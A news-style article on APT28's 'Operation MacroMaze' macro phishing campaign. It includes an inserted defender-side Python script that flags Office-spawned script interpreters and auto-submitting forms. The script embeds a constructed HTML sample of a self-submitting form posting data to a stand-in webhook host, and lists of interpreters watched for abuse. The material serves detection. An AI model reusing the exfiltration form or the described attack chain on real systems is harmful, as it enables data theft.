Russian Hackers Target European Firms with Sophisticated Spear-Phishing Campaign
In recent months, the Russian state-sponsored hacking group known as APT28 (also tracked as Fancy Bear or Sofacy) has been targeting specific entities in Western and Central Europe with infostealers. The campaign, dubbed "Operation MacroMaze," has been active since at least late September 2025 and continued through January 2026. The spear-phishing attack is a clear example of how attackers are using increasingly sophisticated techniques to infiltrate organizations and steal sensitive information.
The operation starts with a highly personalized email aimed at specific individuals or companies, often built around diplomatic themes. The emails typically carry a macro-laden Microsoft Word document that looks harmless but contains malicious code. For the attack to succeed, the victim must enable macros in the document; Microsoft disables them by default because of widespread abuse. APT28 has therefore crafted the Word files to lure victims into enabling macros and running the malicious code.
Once the malicious file is executed, it triggers a chain that drops multiple small scripts and HTML templates, establishes persistence, and exfiltrates data through an auto-submitting HTML form. The malware also notifies the attackers when the victim runs the file, letting them monitor the progress of the attack.
What makes Operation MacroMaze particularly interesting is the way APT28 has used basic tools like batch files, tiny VBS launchers, and simple HTML to create a stealthy attack campaign. By moving operations into hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing payload delivery and data exfiltration to widely used webhook services, the attackers have maximized stealth and minimized detection.
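Two defender-side checks for the execution chain described above, as an added example that is not part of the original article and not from APT28 tooling. It assumes Sysmon-style process-creation records with `pid`, `ppid` and `image` fields and a local allow-list of hosts that forms may legitimately post to; the event lines, the HTML snippets and the `.invalid` hostnames are constructed for the example.

```python
"""Heuristics for a macro-launched script chain and an auto-submitting exfiltration form."""
import json
import re
from urllib.parse import urlparse

# Office hosts that should almost never be the ancestor of a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Interpreters a macro commonly uses to launch batch and VBS stages.
SCRIPT_CHILDREN = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}

# Constructed process-creation events (not real telemetry). Raw strings keep the
# doubled backslashes that JSON expects inside Windows paths.
SAMPLE_EVENTS = [
    r'{"pid": 1200, "ppid": 800, "image": "C:\\Windows\\explorer.exe"}',
    r'{"pid": 4120, "ppid": 1200, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}',
    r'{"pid": 4388, "ppid": 4120, "image": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"pid": 4402, "ppid": 4388, "image": "C:\\Windows\\System32\\wscript.exe"}',
    r'{"pid": 5010, "ppid": 1200, "image": "C:\\Windows\\System32\\cmd.exe"}',  # user-opened shell, benign
]


def _name(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_script_chains(raw_lines, max_depth=4):
    """Return (pid, interpreter, office_ancestor) for every script interpreter
    that has an Office application among its last `max_depth` ancestors."""
    events = [json.loads(line) for line in raw_lines]
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        child = _name(e["image"])
        if child not in SCRIPT_CHILDREN:
            continue
        ppid = e["ppid"]
        for _ in range(max_depth):  # walk up the tree: wscript -> cmd -> WINWORD
            parent = by_pid.get(ppid)
            if parent is None:
                break
            pname = _name(parent["image"])
            if pname in OFFICE_PARENTS:
                hits.append((e["pid"], child, pname))
                break
            ppid = parent["ppid"]
    return hits


# Constructed HTML: a form that posts to an external host and submits itself on load.
SUSPICIOUS_HTML = """<html><body onload="document.forms[0].submit()">
<form method="post" action="https://webhook.example.invalid/hooks/PLACEHOLDER">
<input type="hidden" name="data" value="...">
</form></body></html>"""

# Constructed HTML: an ordinary intranet form the user submits by clicking.
BENIGN_HTML = """<html><body>
<form method="post" action="https://intranet.example.invalid/timesheet">
<input type="submit" value="Save">
</form></body></html>"""

AUTO_SUBMIT_RE = re.compile(r"\.submit\s*\(", re.IGNORECASE)
FORM_ACTION_RE = re.compile(r"<form[^>]*\baction\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)


def auto_submit_form_hosts(html, allowed_hosts):
    """Return external hosts targeted by forms in a page that submits a form via script."""
    if not AUTO_SUBMIT_RE.search(html):
        return []
    findings = []
    for action in FORM_ACTION_RE.findall(html):
        host = urlparse(action).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(host.lower())
    return findings


if __name__ == "__main__":
    for pid, child, parent in office_script_chains(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} {child} descends from {parent}")
    allow = {"intranet.example.invalid"}
    print("suspicious:", auto_submit_form_hosts(SUSPICIOUS_HTML, allow))
    print("benign:", auto_submit_form_hosts(BENIGN_HTML, allow))
```

The ancestry walk matters because the batch stage usually sits between Word and the VBS launcher; matching only the direct parent would miss the second hop. The form check is a triage heuristic, not proof of exfiltration: a page that both submits a form from script and posts to an unrecognised host is worth a look, and the allow-list is where local knowledge goes.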
APT28's cyberattacks support Russia's war against Ukraine, which the Kremlin calls a "Special Military Operation." Spear-phishing campaigns like Operation MacroMaze underline the importance of cybersecurity awareness and training for organizations and individuals alike.
In conclusion, the Operation MacroMaze campaign demonstrates the evolving nature of cyber threats and the need for robust security measures to protect against sophisticated attacks. As hackers continue to innovate and adapt their tactics, it's essential for organizations to stay vigilant and implement effective cybersecurity strategies to prevent similar breaches in the future.